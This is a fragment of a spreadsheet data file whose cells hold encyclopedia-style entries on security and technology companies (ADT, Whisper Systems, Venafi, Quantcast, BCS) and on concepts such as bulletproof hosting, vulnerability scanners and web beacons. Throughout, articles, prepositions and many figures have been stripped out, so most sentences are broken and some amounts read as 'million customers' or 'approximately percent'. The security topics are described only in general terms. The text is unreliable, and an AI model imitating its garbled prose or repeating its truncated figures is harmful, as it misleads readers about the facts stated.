security firm, protection purchase price represented premium approximately percent adt's closing share price february 2016, combined protection represented aggregate transaction value approximately billion.in october 2019, telus corporation purchased adt's canadian assets $700 million. september 2020, telus renamed adt's canadian assets telus smarthome security.in november 2021, announced agreement acquire sunpro solar, residential rooftop solar power contractor, $160 million cash plus approximately 77.8 million shares common stock, implying total enterprise value approximately $825 million. company rebranded "adt solar" operates wholly owned subsidiary adt. operations march 2019, nine monitoring centers network 17,000 professionals, serving million customers locations throughout united states. references external links official website business data inc.:</t>
  </si>
  <si>
    <t>Open Media Commons</t>
  </si>
  <si>
    <t>open media commons, sometimes referred open media commons initiative, computer industry group whose goal "develop open, royalty-free digital rights management codec solutions". largest supporters microsystems, released internal digital rights management (drm) project, project dream, part open media commons initiative august 2005. project dream several project organized open media commons initiative: drm-opera: interoperable architecture dependent upon specific hardware operating system. java stream assembly: java-based server software allows distribution video network. video: royalty-free codec loosely based h.261 tools optimizations. references external links openmediacommons.org official homepage</t>
  </si>
  <si>
    <t>Canovate</t>
  </si>
  <si>
    <t>canovate group companies manufacturer industrial enclosures, server cabinets, fiber optic connectivity data center products. canovate group product lines range fiber optic connectivity data centers solutions rack cabinets intelligent power distribution units coupled (b2b) (b2c) sales. products designs, develops, manufactures markets: fibre optic connectivity based fttx fiber optic transmission-access products data center data center cooling products solutions rack cabinets, enclosure cabinets, boxes accessories outdoor enclosures, frames, boxes accessories structured cabling products pdus remote monitoring, access management flat display mounting interfaces, hdmi cables screen cleaners facts figures headquarters: alemdag, istanbul, turkey present worth exceeds million serves 40,000 customers countries continents employees, engineers 9001 approved operates 26,000m2 manufacturing facilities istanbul invests revenues annually research development products, solutions technologies along various awarded patents references</t>
  </si>
  <si>
    <t>Open Music Initiative</t>
  </si>
  <si>
    <t>open music initiative initiative berklee college music institute creative entrepreneurship (berkleeice) collaboration media support number major music labels, streaming services, publishers, collection societies nearly founding entities. mission open music initiative promote advance creation open source standards innovation related music help assure proper compensation creators, performers rights holders music. history launched june 2016, berklee college music's institute creative entrepreneurship (ice) collaboration media lab's digital currency initiative. founders include berklee institute creative entrepreneurship sonicbids founder panos panay, technology entrepreneur harple, designer entrepreneur michael hendrix. working group includes researchers university college london backing major music labels universal, sony, warner, plus streaming services spotify, pandora radio youtube.omi stated goal establish decentralized global platform using open source framework ensure royalties directly administered music rights holders, creators artists. according panay, believe open sourced platform around creative rights yield innovation dividend creators rights holders alike”.the initiative focused driving creation digital methodologies data collection, data reconciliation, file formats. operational, strategic, technical guidance provided design consulting firm ideo context labs. technology according harple, database standard, instead open-source technical architecture comprised core functional blocks apis allow developers stakeholders build systems tools compliant”. developers stakeholders compliant system could theoretically interoperate compliant systems without giving design operational control. harple said compliance could also solve problems legacy rights management older content.harple's context labs reportedly intends "extend work it’s done traditional publishing supply chain music publishing" blockchain-enabled platform help implement "interoperable framework suitable transformative at-scale improvements music industry needs". reception forbes writer nelson granados commented looks like finally, right group coalescing music industry’s digital value chain" noted, "coordinating powerful players like music labels easy task, disagreements bound arise. getting members commit invest key, hurdles arise process. academics industry getting together, good chance finally solve problem". independent cellist composer keating commented boston globe could facilitate payment smaller projects encourage collaboration among artists, adding “the lack public authoritative record creation ownership keeps coming things stops innovation licensing occurring. main outcomes project, would huge.” also analog hole secure digital music initiative references external links open music initiative</t>
  </si>
  <si>
    <t>Whisper Systems</t>
  </si>
  <si>
    <t>whisper systems american enterprise mobile security company co-founded security researcher moxie marlinspike roboticist stuart anderson 2010. company acquired twitter november 2011. some company's software products released open-source licenses acquisition. independent group called open whisper systems later picked development open-source software, creation signal technology foundation. history security researcher moxie marlinspike roboticist stuart anderson co-founded whisper systems 2010. company produced proprietary enterprise mobile security software. among encrypted texting program called textsecure encrypted voice calling called redphone. they also developed firewall tools encrypting forms data.on november 2011, whisper systems announced acquired twitter. financial terms deal disclosed either company. acquisition done "primarily marlinspike could help then-startup improve security". shortly acquisition, whisper systems' redphone service made unavailable. some criticized removal, arguing software "specifically targeted help] people repressive regimes" left people like egyptians dangerous position" events 2011 egyptian revolution.twitter released textsecure free open-source software gplv3 license december 2011. redphone also released license july 2012.marlinspike later left twitter founded open whisper systems collaborative open source project continued development textsecure redphone. open whisper systems consisted large community volunteer open source contributors, well small team dedicated grant-funded developers. november 2015, open whisper systems merged textsecure redphone renamed signal. 2018, signal messenger incorporated moxie marlinspike brian acton rolled independent non-profit signal technology foundation. today, signal developed signal messenger llc, funded signal foundation. foundation stated publicly tied major technology companies "can never acquired either." products whisper systems' products made android included: textsecure: allowed user exchange end-to-end encrypted messages textsecure users. redphone: allowed user make end-to-end encrypted voip calls redphone users. flashback: allowed user store encrypted backups device cloud. whispercore: integrated underlying android protect everything user kept phone. initial beta featured full disk encryption, network security tools, encrypted backup, selective permissions, basic platform management tools nexus nexus phones. whispermonitor: worked whispercore provide software firewall capable dynamic egress filtering real-time connection monitoring, giving user control data going apps doing. also list mergers acquisitions twitter references external links whisper systems wayback machine (archived january 2013)</t>
  </si>
  <si>
    <t>Venafi</t>
  </si>
  <si>
    <t>venafi, inc. privately held cybersecurity company develops software secure protect cryptographic keys digital certificates. enterprise certificate management security products certificate authority (ca) independent manage security instruments transport layer security (tls) digital certificates secure shell (ssh) keys. venafi sell encryption certificate authority. venafi reports customer base public- private-sector entities, mostly global 5000 organizations operate variety industries. venafi headquartered salt lake city, utah, offices california united kingdom. history russell thornton hodson, university washington graduates, cofounded venafi's predecessor company 1998 recognizing recent consulting project broader commercial application. cofounders incorporated company imcentric washington state october 2000.seeking infusion angel capital, hodson thornton moved company utah joined jayson seegmiller. hodson engineering thornton seegmiller focused business operations. application filed conduct business imcentric, inc. orem, utah march 2003. thornton filed change imcentric's state incorporation (home state) washington delaware april 2004. early 2005 company's leadership name change: name imcentric venafi leadership thornton (president chief executive officer) seegmiller (vice president, secretary, treasurer) trell rohovit (president chief executive officer), william clay epstein (vice president), darren denning (secretary). company also moved headquarters sandy, utah 2005. jeff hudson (current chief executive officer) replaced rohovit october, 2010, company moved salt lake city, 2013. company name venafi made-up word created combining latin roots—vena (vein root) fides (trust faith). venafi secures root trust—the encryption keys certificates. industry affiliations venafi participating organization payment card industry security standards council (pci ssc), issues payment card industry data security standard (pci dss). venafi submitted cryptographic keys digital certificate security guidelines special interest group (sig) topic consideration 2015 2016 sig. topic selected finalist 2015 finalists, selected) 2016 finalists, selected). venafi also member financial services information sharing analysis group (fs-isac). july, 2012, paul turner, venafi's vice president product strategy, co-authored national institute standards technology (nist) information technology laboratory (itl) bulletin (“itl bulletin july 2012: preparing responding certification authority compromise fraudulent certificate issuance”) provides best practices-based information. 2015, turner teamed nist document best practices "security interactive automated access management using secure shell (ssh).". recognition, honors, awards april 2014, magazine awards 2014 europe named venafi finalist best encryption solution best risk/policy management solution categories. 2013, global media company, herring, included venafi software 2013 north america: winners, listing venafi north american private companies. february 2013, magazine awards europe 2013 named venafi director finalist best encryption solution best security management categories. 2013, info security awarded venafi encryption director certificate manager bronze winner risk management category. 2012, venafi director software information industry association (siia) codie award best security solution category (business software). february 2012, venafi nominated eweek labs thirteen “hottest security vendors” conference francisco. february 2012, venafi encryption director certificate manager info security's global excellence award risk management category. 2011, venafi encryption director spot info security's 2011 global excellence award's finalist list policy management category. 2011, magazine awarded venafi encryption director place magazine awards 2011 europe finalist list. november 2011, gartner, information technology research advisory company, acknowledged research note “x.509 certificate management: avoiding downtime brand damage” “venafi leader x.509 certificate management internal external systems applications. unlike certificate authority certificate management solutions, venafi supports virtually certificate issuers natively renew certificates nearly type certificate issuer, providing flexibility complex heterogeneous environments composed certificates issued various certificate authorities.” 2010, magazine awarded venafi 2010 industry innovator distinction. april 2010, gartner named venafi “cool vendor data infrastructure protection.” 2009, venafi director info security's 2009 global excellence award best software product category. october 2007, venafi listed security companies watch infoworld. october 2004, imcentric, venafi's predecessor, recognized utah's high-tech companies utah business magazine. references</t>
  </si>
  <si>
    <t>Open Rights Group</t>
  </si>
  <si>
    <t>open rights group (org) uk-based organisation works preserve digital rights freedoms campaigning digital rights issues fostering community grassroots activists. campaigns numerous issues including mass surveillance, internet filtering censorship, intellectual property rights. history organisation started danny o'brien, cory doctorow, brown, rufus pollock, james cronin, stefan magdalinski, louise ferguson charman panel discussion open tech 2005. o'brien created pledge pledgebank, placed july 2005, deadline december 2005: create standing order pounds month support organisation campaign digital rights 1,000 people too." pledge reached 1000 people november 2005. open rights group launched "sell-out" meeting soho, london. work group made submissions party internet group (apig) inquiry digital rights management gowers review intellectual property.the group honoured 2008 privacy international brother awards alongside no2id, liberty, genewatch others, recognition efforts keep state corporate mass surveillance bay.in 2010 group worked degrees oppose introduction digital economy act, passed april 2010.the group opposes measures draft online safety bill introduced 2021 sees infringing free speech rights online anonymity.the group campaigns department digital, culture, media sport's plan switch opt-out model cookies. group spokesperson stated "[t]he government propose make online spying default option" response proposed switch. goals collaborate digital rights related organisations. nurture community campaigning volunteers, grassroots activists technical legal experts. preserve extend traditional civil liberties digital world. provide media clearinghouse, connecting journalists experts activists. raise awareness media digital rights abuses. areas interest organisation, though focused impact digital technology liberty citizens, operates apparently wide range interests within category. interests include: access knowledge copyright creative commons free open source software public domain crown copyright digital restrictions management software patents free speech censorship internet filtering right parody communications 2003 government democracy electronic voting freedom information legislation privacy, surveillance censorship automatic vehicle tracking communications data retention identity management neutrality patients' medical database police records rfid structure paid staff, whose members include: killock (executive director) javier ruiz diaz (campaigner)former staff include charman-anderson becky hogge, executive directors, e-voting coordinator jason kitcat, campaigner peter bradwell, grassroots campaigner katie sutton administrator katerina maniadaki. group's patron neil gaiman. october 2019 group 3,000 paying supporters. advisory council board directors addition staff members volunteers, advisory panel thirty members, board directors, oversees group's work, staff, fundraising policy. current board members are: january 2015, open rights group announced formation scottish advisory council handling matters relating scottish digital rights campaigns. advisory council made from existing advisory council: judith rauhofer keith mitchell lilian edwards wendy grossmanand open rights group board: milena popova owen blacker simon phippsone first projects raise awareness opposition scottish identity database. orgcon orgcon first ever conference dedicated digital rights marketed crash course digital rights". held first time 2010 city university london included keynote talks cory doctorow, politicians similar pressure groups including liberty, no2id brother watch. orgcon since held 2012, 2013, 2014, 2017, 2019 keynote given edward snowden. also campaign against censorship censorship united kingdom internet censorship open genealogy alliance references external links official website</t>
  </si>
  <si>
    <t>Candid (app)</t>
  </si>
  <si>
    <t>candid mobile anonymous discussions. used machine learning create personalized newsfeeds opinions real conversations, also moderation filtering. users posted pseudonyms "hypermantis", "sinceregiraffe", "groundedturtle" "exuberantraptor", unique thread.founder bindu reddy said needed place express engage discussions ideas debated merits instead used attack person", candid tried solve redirecting off-topic comments appropriate groups, removing spam flagging negative posts. they used natural language processing identify hate speech, slander threats, removed accordingly human intervention. candid software analyzed topics tried flag rumors lies such. users could flag problematic posts team contractors would review individually. with time system analyzed user's interactions give labels, socializer, explorer, positive, influencer, hater, gossip, etc.in june 2017, candid announced would shut parent company, post intelligence, acquired. forecast close june 2017, actually close june 2017. company bought uber june 2017. notes references</t>
  </si>
  <si>
    <t>BCS Higher Education Qualifications</t>
  </si>
  <si>
    <t>bcs, chartered institute known british computer society 2009, professional body learned society represents working information technology (it) computer science, united kingdom internationally. founded 1956, played important role educating nurturing professionals, computer scientists, computer engineers, upholding profession, accrediting chartered professional status, creating global community active promoting furthering field practice computing. overview with worldwide membership 57,625 members 2021, registered charity incorporated royal charter 1984. objectives promote study application communications technology computing technology advance knowledge education benefit professional practitioners general public. member institution engineering council, licensed award designation incorporated engineer chartered engineer therefore responsible regulation computer science fields within also member council european professional informatics societies, seoul accord international tertiary degree recognition, european quality assurance network informatics education eqanie. previously member organisation science council licensed award designation chartered scientist. offices city london. main administrative offices swindon, wiltshire, west london. also overseas offices lanka mauritius. members sent quarterly professional magazine itnow (formerly computer bulletin). member organisation federation enterprise architecture professional organizations (feapo), worldwide association professional organisations come together provide forum standardise, professionalise, otherwise advance discipline enterprise architecture. history forerunner "london computer group" (lcg), founded 1956. formed year later merger unincorporated association scientists unincorporated club. october 1957, incorporated, articles association, "the british computer society ltd": first president maurice wilkes (1913–2010), frs. 1966, granted charitable status 1970, given armorial bearings including shield crest. major ethical responsibilities emphasised leopard's face, surmounting whole crest depicting eternal vigilance integrity society members. patron duke kent, became patron december 1976 actively involved activities, particularly president silver jubilee year 1982–1983. 2007, launched bcsrecruit.com site specifically aimed professionals. 2008 labelled "irrelevant" training company, connection claims made nine professionals "unaware" bcs's chartered accreditation scheme.on september 2009, british computer society went transformation re-branded "bcs chartered institute it". 2010, extraordinary general meeting called discuss direction bcs. debate covered computing press. governance governed trustee board comprising president, deputy president, immediate past president, nine vice presidents (including vice-president finance), five professional members elected advisory council. maurice wilkes, professor computer science cambridge university, served first president. each president serves 2-year term. list presidents british computer society found site.the advisory council elects honorary officers president, deputy president nine vice-presidents, together immediate past president five members council. lists trust board advisory council members maintained online.the advisory council provides advice trustee board direction operation bcs; particular, consulted strategic plans annual budget. council representative body membership, members elected directly professional membership, branches, groups forums. fellow british computer society (fbcs) fellow (fbcs) title conferred individuals recognise outstanding achievements contributions information technology. fellows expected give something back profession, promoting evangelising profession public society, contributing debates conferences, panels, meetings, etc. fellows nominated society year supported existing fellows. criteria election fellow include: demonstrate leadership profession wide acknowledgement specific expertise contribution advancement knowledge eminent individual authority seniority, including leading major projects managing teamscurrent fellows include distinguished individuals industries universities. some prominent fellows include: dame wendy hall, fbcs ex-president andy harter, fbcs –ceo realvnc tony hey, fbcs ex-vp microsoft research hermann hauser, distinguished fbcs founder ltd. frank zhigang wang, fbcs –inventor spin-tunneling random access memorythe society also awards honorary fellowships. examples include: dorothy monekosso, received honour work smart homes people living dementia campaigning work promote diversity tech sector. chartered professional professional body united kingdom ability grant chartered status professionals royal charter, granted privy council. thus ability grant chartered (professional) status fellows professional members. known chartered professional, entitled suffix citp. keeps register current chartered members fellows.other professional membership bodies apply licence enables award citp eligible members. grades membership different grades membership: honorary gradesdistinguished fellow (only awards since 1971) honorary fellowship (hon fbcs) (only awarded date)professional gradesfellow (fbcs) member (mbcs)ordinary gradesassociate member (ambcs) student membergroup, corporate membership categoriesaffiliate: interest employed role. group membership: nearly organisations encourage professionals join society group membership scheme. education affiliates: education intuitions also accredited bcs.other chartered designationsthe engineering council licensed award chartered engineer status (ceng) incorporated engineer status (ieng). science council formerly licensed award chartered scientist status (csci). however, longer offers chartered scientist status (csci) members also apply european federation national engineering associations (feani) european engineer (eur ing) status.designatory (post-nominal) lettersmembers encouraged display designatory letters entitled whenever appropriate. order designatory (post-nominal) letters complex open certain amount interpretation. accepted authority subject debrett’s correct form. normally appear decorations, degrees chartered letters. members holding ceng also display designatory letters institution registered immediately ceng. conventionally, members holding chartered status (citp) display immediately membership letters (e.g., fbcs citp mbcs citp). however, citp awarded organisations also displayed separately, following awarding institution. some examples bcs-related post-nominals: frank james mbe, fbcs. frank james mbe, msc, ceng, mbcs, miet. frank james mbe, (hons), mbcs, citp. frank james mbe, msc, csci, miet, citp. frank james mbe, msc, mcgi, ceng, mbcs, fedipadvpra. awards society provides several awards recognise outstanding computer scientists, engineers, experienced young professionals. awards include: lovelace medal roger needham award early career award john perry prize distinguished dissertation award industry award qualifications provides range qualifications users computers professionals. user qualifications offers qualifications cover areas including understanding spreadsheets presentation software, animation, video editing social networking safety.the current user qualifications are: european computer driving licence (ecdl) organisation licensed offer ecdl qualifications advanced ecdl advanced course ecdl ("advanced ecdl") four sections, qualification right. upon achieving four advanced qualifications, individual receive qualification "ecdl expert" confers upon person associate membership british computer society, person wish sign code conduct join bcs. higher education qualifications (heqs) conducts higher education qualifications many countries. formerly known professional examinations consisted parts passing part professional project equivalent british honours degree. these programs early history success, participants coming parts world, including asia. many private computing schools outside hosted students preparation part examinations. level current qualifications are: certificate (equivalent first year honours university degree) diploma (equivalent second year honours university degree) professional graduate diploma (equivalent british honours university degree)e-typee-type qualification allows individuals improve certify typing skills. average user save days year improving typing speed well preventing repetitive strain injury (rsi). e-type comes full support materials computer-based courseware allowing user assess skills using simple online test. digital creatordigital creator engaging qualifications teach digital media skills creative projects. they designed types ages learners schools stage stage areas adult learning. flexible qualificationthe range user qualifications made combination units available framework. framework consists wide range units covering aspects user applications, including word processing, spreadsheets, internet, multimedia software design software. other certifications isebbcs also offers professional qualifications professional certifications board, formerly known iseb (information systems examination board). professional certifications (iseb) provides wide range qualifications professionals covering major areas including management, development, service delivery quality. informatics professionalbcs fedip provides different professional registration levels health care informatics professionals: practitioner, senior practitioner, advanced practitioner, leading practitioner. fedipadvpra post-nominals advanced practitioner. fedip federation informatics professionals health social care, collaboration leading professional bodies health care informatics supporting development informatics profession. retired qualifications e-citizenthe e-citizen qualification allows beginners online start using internet. qualification designed provide basic understanding internet start using safely, reading email shopping online. (management risk)m_o_r foundation suitable organisation individual seeing need guidance controlled approach identification, assessment control risk strategic, programme, project operational perspectives. structure common many professional institutions, number regional branches specialist groups. currently, regional branches international sections specialist groups. regional branches branches are: international sections specialist groups works september 2010, sponsored one-off 'digital revolutions film workshop' amateurs professionals "hone skills", october 2010, conjunction sheffield doc/fest, sponsored 'digital revolutions film competition'.bcs magazines include: itnow (formerly computer bulletin), quarterly professional magazine, issn 1746-5702their journals mostly published oxford university press include: computer journal, monthly journal, online issn 1460-2067, print issn 0010-4620 formal aspects computing, quarterly journal formal methods, online issn 1433-299x, print issn 0934-5043 interacting computers, interdisciplinary journal human-computer interaction, issn 0953-5438electronic workshops computing (ewic) series conference workshop proceedings, published bcs, also available open access scienceopen. references</t>
  </si>
  <si>
    <t>BCS Professional Examinations</t>
  </si>
  <si>
    <t>Vera Security</t>
  </si>
  <si>
    <t>vera enterprise data security information rights management platform provides encryption tracks controls digital information shared across users, devices, applications, platforms. vera gives developers access irm-as-a-service (irmaas) platform rest downloadable software development kit. history vera launched product april 2015. within first year operations, vera announced partnerships dropbox, okta, centrify, well strategic integrations box, vmware, microsoft office. vera focuses sales marketing efforts large enterprises industries financial services, media entertainment, manufacturing, technology sectors. awards vera nominated finalist innovation sandbox competition conference 2016, magazine named vera coolest security startups 2015". funding vera privately funded company million venture financing. company announced million series round november 2014, included hiring robin daniels cmo. february 2016, vera announced million series round, sutter hill ventures, participation existing investors, battery ventures, amplify partners, private investors. 2016, capital growth ventures joined company's series round financing founding veritas software, mark leslie, joined vera's board directors. roger (battery ventures) stefan dyckerhoff (sutter hill ventures) also serve company's board. product architecture march 2016, vera announced sdk, allows developers encryption, tracking, policy enforcement, access control custom legacy business applications. references</t>
  </si>
  <si>
    <t>AEGIS SecureConnect</t>
  </si>
  <si>
    <t>aegis secureconnect simply aegis) former name network authentication system used ieee 802.1x networks. developed meetinghouse data communications, inc.; system renamed "cisco secure services client" meetinghouse acquired cisco systems. aegis protocol 802.1x supplicant (i.e. handles authentication wired wireless networks, wpa-psk, wpa-radius, certificate-based authentication), commonly installed along network interface card's (nic) drivers. references external links cisco secure services client (cisco systems, inc.)</t>
  </si>
  <si>
    <t>Quantcast</t>
  </si>
  <si>
    <t>quantcast american technology company, founded 2006, specializes ai-driven real-time advertising, audience insights measurement. offices united states, canada, australia, singapore, united kingdom, ireland, france, germany, italy, sweden. history quantcast launched 2006. company built belief digital advertising requires reliable data successful. initially primary gather detailed, real-time insights audience characteristics across internet. placing tags digital content across open internet, firm measures metrics audience gender makeup, areas interest type, length frequency engagement certain types content. this private information made publicly available used marketers publishers accurately understand audience granular detail.in 2010, quantcast's publisher program first syndicated online traffic measurement service receive official accreditation media rating council (mrc).in 2013, company acquired makegood software, advertising technology startup simplifies data management reporting online advertising campaigns. technology subsequently integrated quantcast advertise enhance reporting functions available quantcast campaigns. this nudged company closer towards competition effectiveness category, includes companies like comscore.in 2021, quantcast unveiled quantcast platform, self-service intelligent audience platform brands, agencies, publishers advertise open internet.in 2021, quantcast announced launch educational program, quantcast academy, self-paced, online training program provides learning certification digital advertising.in 2021, quantcast revealed cookieless solution quantcast platform. recognition 2013 onmedia private companies b2b: advertising analytics 2012 wired magazine: francisco tech companies wish worked 2012 alwayson global private companies 2011 onmedia private companies b2b: advertising analytics 2011 business insider digital 100: quantcast ranked 2010 fast company most innovative companies 2015 glassdoor employee's choice award, best places work 2016 quantcast partnered europe, anas create educational program industry professionals understand language, tools, processes online advertising ecosystem. 2016 business insider: hottest pre-ipo tech startups 2016. ranked #11. 2021 martech breakthrough awards: quantcast “best analytics solution” quantcast measure 2021 best awards north america: quantcast platform named silver winner “best product year” category 2021 human rights campaign foundation: best places work lgbtq equality 2022 human rights campaign foundation: best places work lgbtq+ equality 2022 built honors quantcast esteemed 2022 best places work awards references external links official website</t>
  </si>
  <si>
    <t>Bulletproof hosting</t>
  </si>
  <si>
    <t>bulletproof hosting (bph) technical infrastructure service provided hosting provider resilient complaints illicit activities, serves criminal actors basic building block streamlining various cyberattacks. providers allow online gambling, illegal pornography, botnet command control servers, spam, copyrighted materials, hate speech misinformation, despite takedown court orders enforcement subpoenas, allowing material acceptable policies.bph providers usually operate jurisdictions lenient laws conduct. most non-bph service providers prohibit transferring materials network would violation terms service local laws incorporated jurisdiction, oftentimes abuse reports would result takedowns avoid autonomous system's block blacklisted providers spamhaus. history first became subject research 2006 security researchers verisign revealed russian business network, internet service provider hosted phishing group responsible $150 million phishing-related scams. also become known identity thefts, child pornography, botnets. following year, mccolo, hosting provider responsible global spam shut de-peered global crossing hurricane electric public disclosure then-washington post reporter brian krebs security blog newspaper. difficulties since abuse reports disregarded, cases, whole block ("netblock") assigned bph's autonomous system blacklisted providers third party spam filters. additionally, also difficulty finding network peering points establishing border gateway protocol sessions, since routing provider's network affect reputation upstream autonomous systems transit provider. this makes difficult services provide stable network connectivity, extreme cases, completely de-peered; therefore providers evade as's reputation based fortification ranking aswatch unconventional methodologies. hosting reseller according report, mounting difficulties, providers engage establishing reseller relationships lower-end hosting providers; although providers complicit supporting illegitimate activities, tend lenient abuse reports actively engage fraud detection. therefore, conceals behind lower-end hosting providers, leveraging better reputation simultaneously operating bulletproof legitimate resells sub-allocated network blocks. however, services caught, providers migrate clients newer internet infrastructure—newer lower-end space—effectively making blacklisted addresses previous ephemeral; thus continuing engage criminal conduct modifying server's resource records listening services making point newer addresses belonging current as's space. privacy concerns, customary modes contact providers include icq, skype, xmpp jabber). admissible abuses most providers promise immunity copyright infringement court order takedown notices, notably digital millennium copyright (dmca), electronic commerce directive (ecd) enforcement subpoenas. they also allow users operate phishing, scams (such high-yield investment program), botnet masters unlicensed online pharmacy websites. cases, providers (known "offshore providers") operate jurisdictions extradition treaty mutual legal assistance treaty (mlat) signed five countries, particularly united states. however, providers zero-tolerance policy towards child pornography terrorism, although allow cold storage material given forbidden open-accessibility public internet.prevalent jurisdictions incorporation location data centers providers include russia (being permissive), ukraine, china, moldova, romania, bulgaria, belize, panama seychelles. impacts services vital network infrastructure providers activities cybercrime online illicit economies, well-established working model cybercrime economies surrounds upon tool development skill-sharing among peers. development exploits, zero-day vulnerabilities, done small community highly-skilled actors, encase convenient tools usually bought low-skilled actors (known script kiddies), make providers carry cyberattacks, usually targeting low-profile unpretentious network services individuals. according report produced carnegie mellon university united states department defense, low-profile amateur actors also potent causing harmful consequences, especially small businesses, inexperienced internet users, miniature servers.criminal actors also specialized computer programs providers knowns port scanners scan entire ipv4 address space open ports, services open ports, version service daemons, searching vulnerable versions exploitation. notable vulnerability scanned port scanners heartbleed, affected millions internet servers. furthermore, clients also host click fraud, adware (such dollarrevenue), money laundering recruitment sites, lure untried internet users honey trapping causing financial losses individuals unrestrictedly keeping illicit sites online, despite court orders takedown attempts enforcement. counterinitiatives spamhaus project international nonprofit organization monitors cyber threats provides realtime blacklist reports (known "badness index") malicious ass, netblocks, registrars involved spam, phishing, cybercrime activities. spamhaus team works closely enforcement agencies national cyber-forensics training alliance (ncfta) federal bureau investigation (fbi), data compiled spamhaus used majority isps, email service providers, corporations, educational institutes, governments uplink gateways military networks. spamhaus publishes various data feeds list netblocks criminal actors, designed gateways, firewalls routing equipments filter "nullroute") traffic originating netblocks: spamhaus don't route peer list (drop) lists netblocks allocated established regional internet registry (rir) national internet registry (nir) used criminal actors, include abused address spaces sub-allocated netblocks reputable spamhaus domain block list (dbl) lists domain names poor reputation dnsbl format. spamhaus botnet controller list (bcl) lists single ipv4 addresses botnet masters. notable closed services following notable defunct providers: cyberbunker, taken september 2019. mccolo, taken november 2008. russian business network (rbn), taken november 2007. atrivo, taken september 2008. 3fn, taken june 2009. proxiez, taken 2010. also freedom hosting fast flux security theater references bibliography mccoy, damon; xianghang; wang, xiofeng june 2017). "under shadow sunshine: understanding detecting bulletproof hosting legitimate service provider networks". ieee security privacy. york university: 805–823. doi:10.1109/sp.2017.32. isbn 978-1-5090-5533-3. s2cid 1593958. han, catherine; kumar, deepak; durumic, zakir (2021). infrastructure providers support misinformation" (pdf). stanford university. archived (pdf) original august 2021. retrieved december 2021. konte, maria; feamster, nick; perdisci, roberto august 2015). "aswatch: reputation system expose bulletproof hosting ases". sigcomm association computing machinery. york, united states. (4). doi:10.1145/2829988.2787494. issn 0146-4833. leporini, dino (2015). architectures protocols powering illegal content streaming internet. university pisa. amsterdam, netherlands: international broadcasting convention. doi:10.1049/ibc.2015.0013. isbn 978-1-78561-185-8. clayton, richard; moore, tyler december 2008). "the impact incentives notice take-down". managing information risk economics security. boston: springer publishing: 199–223. doi:10.1007/978-0-387-09762-6_10. isbn 978-0-387-09761-9. kopp, daniel; strehle, eric; hohlfeld, oliver (november 2021). "cyberbunker domain traffic perspective bulletproof hoster". proceedings 2021 sigsac conference computer communications security. association computing machinery, brandenburg university technology. 2432–2434. arxiv:2109.06858. doi:10.1145/3460120.3485352. isbn 9781450384544. s2cid 237503582. collier, benjamin; hutchings, alice april 2021). "cybercrime (often) boring: maintaining infrastructure cybercrime economies". british journal criminology. oxford university press. (5). doi:10.1093/bjc/azab026. bradbury, danny october 2010). "digging hacking underground". infosecurity. sciencedirect. (5): 14–17. doi:10.1016/s1754-4548(10)70084-x. issn 1754-4548. konte, feamster, jung, (january 2008). "sac 025: ssac advisory fast flux hosting dns" (pdf). security stability advisory committee (ssac). internet corporation assigned names numbers (1). archived (pdf) original november 2021. retrieved december 2021.</t>
  </si>
  <si>
    <t>Bulk personal datasets</t>
  </si>
  <si>
    <t>"bulk personal datasets" government's euphemism datasets containing personally identifiable information large number individuals, part mass surveillance united kingdom citizens around world. term first used publicly march 2015 intelligence security committee parliament, subject significant controversy. other government departments programmes utilising bulk personal datasets, care.data programme department health national health service. health, bulk personal datasets created by-product providing direct care. controversy judicial body oversees intelligence services united kingdom, investigatory powers tribunal, ruled legislative framework united kingdom permit mass surveillance gchq collects analyses data bulk, practice mass surveillance. special report published intelligence security committee parliament also came view, although found past shortcomings oversight said legal framework simplified improve transparency. this view supported independent reports interception communications commissioner. however, notable campaign groups broadsheet newspapers continue express strong views contrary, others criticised viewpoints turn. references</t>
  </si>
  <si>
    <t>Vulnerability scanner</t>
  </si>
  <si>
    <t>vulnerability scanner computer program designed assess computers, networks applications known weaknesses. these scanners used discover weaknesses given system. they utilized identification detection vulnerabilities arising mis-configurations flawed programming within network-based asset firewall, router, server, application server, etc. modern vulnerability scanners allow authenticated unauthenticated scans. modern scanners typically available saas (software service); provided internet delivered application. modern vulnerability scanner often ability customize vulnerability reports well installed software, open ports, certificates host information queried part workflow. authenticated scans allow scanner directly access network based assets using remote administrative protocols secure shell (ssh) remote desktop protocol (rdp) authenticate using provided system credentials. this allows vulnerability scanner access low-level data, specific services configuration details host operating system. it's able provide detailed accurate information operating system installed software, including configuration issues missing security patches. unauthenticated scans method result high number false positives unable provide detailed information assets operating system installed software. this method typically used threat actors security analyst trying determine security posture externally accessible assets.the critical security controls effective cyber defense designates continuous vulnerability scanning critical control effective cyber defense. also browser security computer emergency response team information security internet security mobile security dynamic application security testing penetration testing pentesting software toolkits openvas nessus metasploit project snort references external links application [need link legit site, site hoax] national institute standards technology (nist) publication security content automation protocol (scap) outline.</t>
  </si>
  <si>
    <t>Web beacon</t>
  </si>
  <si>
    <t>beacon technique used pages email unobtrusively (usually invisibly) allow checking user accessed content. beacons typically used third parties monitor activity users website purpose analytics page tagging. they also used email tracking. when implemented using javascript, called javascript tags.using beacons, companies organizations track online behaviour users. first, companies tracking mainly advertisers analytics companies; later social media sites also started tracking techniques, instance buttons tracking beacons. 2017, published candidate specification interface developers create beacons. overview beacon several techniques used track visiting page. they also used email read forwarded page copied another website.the first beacons small digital image files embedded page email. image could small single pixel "tracking pixel") could colour background, completely transparent. when user opens page email image embedded, might image, browser email reader automatically downloads image, requiring user's computer send request host company's server, source image stored. this request provides identifying information computer, allowing host keep track user. this basic technique developed many types elements used beacons. currently, include visible elements graphics, banners, buttons, also non-pictorial html elements frame, style, script, input link, embed, object, etc., email page. identifying information provided user's computer typically includes address, time request made, type browser email reader made request, existence cookies previously sent host server. host server store information, associate session identifier tracking token uniquely marks interaction. companies once company identify particular user, company track user's behavior across multiple interactions different websites servers. example, consider company owns network websites. this company could store images particular server, store contents pages variety servers. instance, server could specific given website, could even located different city. company could beacons requesting data image server count recognize individual users visit different websites. rather gathering statistics managing cookies server independently, company analyze data together, track behavior individual users across different websites, assembling profile user navigate different environments. email tracking beacons embedded emails greater privacy implications beacons embedded pages. through embedded beacon, sender email even third party record sort information advertiser website, namely time email read, address computer used read email address proxy server reader went through), type software used read email, existence cookies previously sent. way, sender third party gather detailed information particular recipient reads email. every subsequent time email message displayed, information sent sender third party. "return-receipt-to" (rrt) email headers also trigger sending information seen another form beacon.web beacons used email marketers, spammers, phishers verify email read. using system, send similar emails large number addresses check ones valid. valid case means address actually use, email made past spam filters, content email actually viewed. extent, kind email tracking prevented configuring email reader software avoid accessing remote images. neutralize email tracking disconnect internet downloading email reading downloaded messages. (note assumes using email reader resides one's computer downloads 